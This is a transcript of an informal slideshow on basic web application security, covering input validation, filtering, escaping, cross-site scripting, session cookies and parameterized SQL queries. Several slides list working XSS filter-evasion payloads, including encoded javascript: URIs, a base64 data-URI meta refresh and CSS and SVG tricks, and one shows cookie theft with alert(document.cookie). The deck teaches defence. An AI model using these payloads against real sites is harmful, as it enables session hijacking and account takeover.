Presentation is loading. Please wait.

Presentation is loading. Please wait.

Basic Web Application Security. User Input Kick Your Arse.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Basic Web Application Security. User Input Kick Your Arse."— Presentation transcript:

1 Basic Web Application Security

2 User Input

3

4 Kick Your Arse

5

6 Three Ways (All Awesome)

7 Validation

8 Passive (No touchy-touchy)

9 This is a Number. 2

10 This is not a Number. a

11 This is really not a Number. alert(‘loldongs’)

12 Filtering

13 Destructive (One-Way Street)

14 Only letting the good stuff in.

15 or

16 Keeping out the bad stuff.

17 What’s the diff? (Bro.)

18 Both can be error- prone...

19 White-Listing  Usability Problems What happens when you screw it up? Black-Listing  Security Problems (Always a trade-off.)

20 Escaping

21 Transport Point A  Point B

22 Data will be the same on both sides.

23 Different Media, Different Escaping

24 HTML Huh. <b>Huh.</b> Huh

25 SQL Sam O’Brien INSERT INTO mah_peeps (name) VALUES (‘Sam O\’Brien‘); 1, Sam O’Brien, 2010-09-02 18:30:00

26 XSS (Cross-Site Scripting)

27 (XTREME Site Scripting) SS

28 Sticking Scripts Where They Don’t Belong. You there, down the back. Stop sniggering.

29 alert(‘HACKED BY LOLDONGS’) Amateurs!

30 alert(document.cookie) Hmm.

31 document.write(‘ ’); Oh shit.

32 Why is this uncool? (Yeah! Why?)

33 document.write(‘ ’); Ooooh shit.

34 document.write(‘ ’); Oooooooooooh shit.

35 document.write(‘ ’); Oooooooooooooooooh shit.

36 Why is this really uncool? (Because shut up.)

37 HTTP Hyper-Text Thingy I-forgot-again

38 Stateless

39 No Idea Who You Are.

40 It can guess. (Badly.) IP Address Browser User-Agent

41 Sends a cookie with each request. (A basket of goodies that the browser sends faithfully every request.)

42 The Server puts a unique ID in the basket. PHPSESSID=123your456mum78 9 __utma=12948.23.4211414.5553 is_a_furry=1

43 Browser sends the ID every request. PHPSESSID=123your456mum78 9

44 document.write(‘ ’); Look again.

45 THEY HAVE YOUR COOKIE. Ooooooooooooooooooooooo-

46 Preventing Shenanigans

47 HTML Validation  Really Hard.

48 HTML Filtering  Still Really Hard. Use a library, eg. HTML Purifier.

49 HTML Escaping  Dead Easy. Most languages have stuff to handle this, eg. htmlentities(), cgi.escape(), CGI.escape()

50 How hard is filtering? (It’s just, right?)

51 THIS HARD. alert('a') ”> <IMG SRC=javascr ipt:aler t('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72 &#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> (Well, then.) alert('a') alert("a");// RIPT>alert('a'); RIPT> <img src=”javascript:alert('a')”

52 THIS HARD. <iframe src=http://foo/x.html < BODY{-moz- binding:url("http://foo/x.xml#xss")} (Well, then.) žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion) <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

53 THIS HARD. <DIV STYLE="background- image:\0075\0072\006C\0028'\006a \0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061 \006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029' \0029"> @im\port'\ja\vasc\ript:alert("a")'; exp/* alert('a'); (Well, then.).x{background- image:url("javascript:alert('a')");} <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....j wvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"> ]]>

54 One more thing about XSS. (Groan.)

55 Remember alert() ? (Yes, I do. Shut up.)

56 alert() can be ANY JAVASCRIPT. (Yes, and...?)

57 Do you have any forms on your page? (Yes.)

58 Do you have any javascript functions your site uses to do anything useful? (... Yes.)

59 Do your site make any AJAX calls to do anything useful? (... Oh.)

60 That injected code can trigger forms, run javascript functions, or make AJAX calls. (... Oooooh.)

61 Send someone to a link that looks like: http://my.site/?user= doStuff(); (... Oooooooooh.)

62 Or store something that will output this on someone’s profile page: doStuff(); (... Oooooooooooooooh.)

63 ... And you’re hosed. (Shit.)

64 The Human Element Touchy-Feely Commie Bullshit.

65 We are very fallible.

66 We will forget things.

67 When time gets short, we take the easy path.

68 Design systems so that they naturally encourage security.

69 SQL Insert(“INSERT INTO posts VALUES (‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’, ‘”.sql_safe($author).”’)”);

70 SQL or

71 SQL insert(“INSERT INTO posts VALUES (:title, :content, :author)”, $title, $content, $author);

72 HTML - Written by

73 HTML or

74 HTML - Written by

75 Questions?

76 Now get out.

Download ppt "Basic Web Application Security. User Input Kick Your Arse."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
PHP syntax basics. Personal Home Page This is a Hypertext processor It works on the server side It demands a Web-server to be installed.

PHP syntax basics. Personal Home Page This is a Hypertext processor It works on the server side It demands a Web-server to be installed.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
SERVER web page repository WEB PAGE instructions stores information and instructions BROWSER retrieves web page and follows instructions Server Web Server.

SERVER web page repository WEB PAGE instructions stores information and instructions BROWSER retrieves web page and follows instructions Server Web Server.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Web Page Behavior IS 373—Web Standards Todd Will.

Web Page Behavior IS 373—Web Standards Todd Will.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Security & VanillaCMS An XSS Introduction and Attack Demonstration.

Security & VanillaCMS An XSS Introduction and Attack Demonstration.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Introduction to JavaScript. Aim To enable you to write you first JavaScript.

Introduction to JavaScript. Aim To enable you to write you first JavaScript.
1 CS428 Web Engineering Lecture 18 Introduction (PHP - I)

1 CS428 Web Engineering Lecture 18 Introduction (PHP - I)
Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.

Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.

Similar presentations

Ads by Google